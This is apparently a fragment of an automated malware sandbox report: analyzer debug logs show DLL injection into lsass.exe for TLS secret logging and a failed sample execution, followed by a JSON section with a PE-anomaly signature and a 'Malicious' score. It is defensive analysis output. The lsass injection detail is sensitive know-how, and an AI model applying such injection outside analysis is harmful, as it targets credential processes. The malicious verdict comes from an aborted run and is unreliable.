Hooked 5 out of 5 functions\n2025-02-21 15:19:01,497 [root] DEBUG: 660: TLS 1.2 secrets logged to: C:\\KGHrEg\\tlsdump\\tlsdump.log\n2025-02-21 15:19:01,499 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-02-21 15:19:01,508 [root] DEBUG: Successfully injected DLL C:\\tmp7wr5rocj\\dll\\xArRdOM.dll.\n2025-02-21 15:19:01,519 [lib.api.process] INFO: Injected into 64-bit <Process 660 lsass.exe>\n2025-02-21 15:19:01,519 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump\n2025-02-13 13:27:51,169 [root] INFO: Restarting WMI Service\n2025-02-13 13:27:51,221 [root] DEBUG: package modules.packages.exe does not support configure, ignoring\n2025-02-13 13:27:51,223 [root] WARNING: configuration error for package modules.packages.exe: error importing data.packages.exe: No module named 'data.packages'\n2025-02-13 13:27:51,223 [lib.common.common] INFO: Submitted file is missing extension, adding .exe\n2025-02-13 13:27:51,223 [lib.core.compound] INFO: C:\\Users\\pacop\\AppData\\Local\\Temp already exists, skipping creation\n2025-02-13 13:27:51,234 [lib.api.process] ERROR: Failed to execute process from path \"C:\\Users\\pacop\\AppData\\Local\\Temp\\ae66e009e16f0fad3b70ad20.exe\" with arguments \"None\" (Error: %1 is not a valid Win32 application (ERROR_BAD_EXE_FORMAT))\n2025-02-13 13:27:51,234 [root] ERROR: You probably submitted the job with wrong package\nTraceback (most recent call last):\n File \"C:\\tmp7wr5rocj\\analyzer.py\", line 620, in run\n pids = self.package.start(self.target)\n File \"C:\\tmp7wr5rocj\\modules\\packages\\exe.py\", line 47, in start\n return self.execute(path, args, path)\n File \"C:\\tmp7wr5rocj\\lib\\common\\abstracts.py\", line 174, in execute\n raise CuckooPackageError(\"Unable to execute the initial process, analysis aborted\")\nlib.common.exceptions.CuckooPackageError: Unable to execute the initial process, analysis aborted\n\nThe above exception was the direct cause of the following exception:\n\nTraceback (most recent call last):\n File \"C:\\tmp7wr5rocj\\analyzer.py\", line 1529, in <module>\n success = analyzer.run()\n File \"C:\\tmp7wr5rocj\\analyzer.py\", line 624, in run\n raise CuckooError(f'The package \"{self.package_name}\" start function raised an error: {e}') from e\nlib.common.exceptions.CuckooError: The package \"modules.packages.exe\" start function raised an error: Unable to execute the initial process, analysis aborted\n2025-02-13 13:27:51,234 [root] WARNING: Folder at path \"C:\\KGHrEg\\debugger\" does not exist, skipping\n2025-02-13 13:27:51,234 [root] INFO: Uploading files at path \"C:\\KGHrEg\\tlsdump\"\n2025-02-13 13:27:51,234 [lib.common.results] INFO: Uploading file C:\\KGHrEg\\tlsdump\\tlsdump.log to tlsdump\\tlsdump.log; Size is 15618; Max size: 100000000\n2025-02-13 13:27:51,245 [root] INFO: Analysis completed\n", | |
| "errors": [] | |
| }, | |
| "network": {}, | |
| "suricata": { | |
| "alerts": [], | |
| "tls": [], | |
| "perf": [], | |
| "files": [], | |
| "http": [], | |
| "dns": [], | |
| "ssh": [], | |
| "fileinfo": [], | |
| "eve_log_full_path": null, | |
| "alert_log_full_path": null, | |
| "tls_log_full_path": null, | |
| "http_log_full_path": null, | |
| "file_log_full_path": null, | |
| "ssh_log_full_path": null, | |
| "dns_log_full_path": null | |
| }, | |
| "url_analysis": {}, | |
| "procmemory": [], | |
| "signatures": [ | |
| { | |
| "name": "static_pe_anomaly", | |
| "description": "Anomalous binary characteristics", | |
| "categories": [ | |
| "static" | |
| ], | |
| "severity": 3, | |
| "weight": 1, | |
| "confidence": 80, | |
| "references": [], | |
| "data": [ | |
| { | |
| "anomaly": "Entrypoint of binary is located outside of any mapped sections" | |
| } | |
| ], | |
| "new_data": [], | |
| "alert": false, | |
| "families": [] | |
| } | |
| ], | |
| "malscore": 10.0, | |
| "ttps": [], | |
| "malstatus": "Malicious" | |
| } |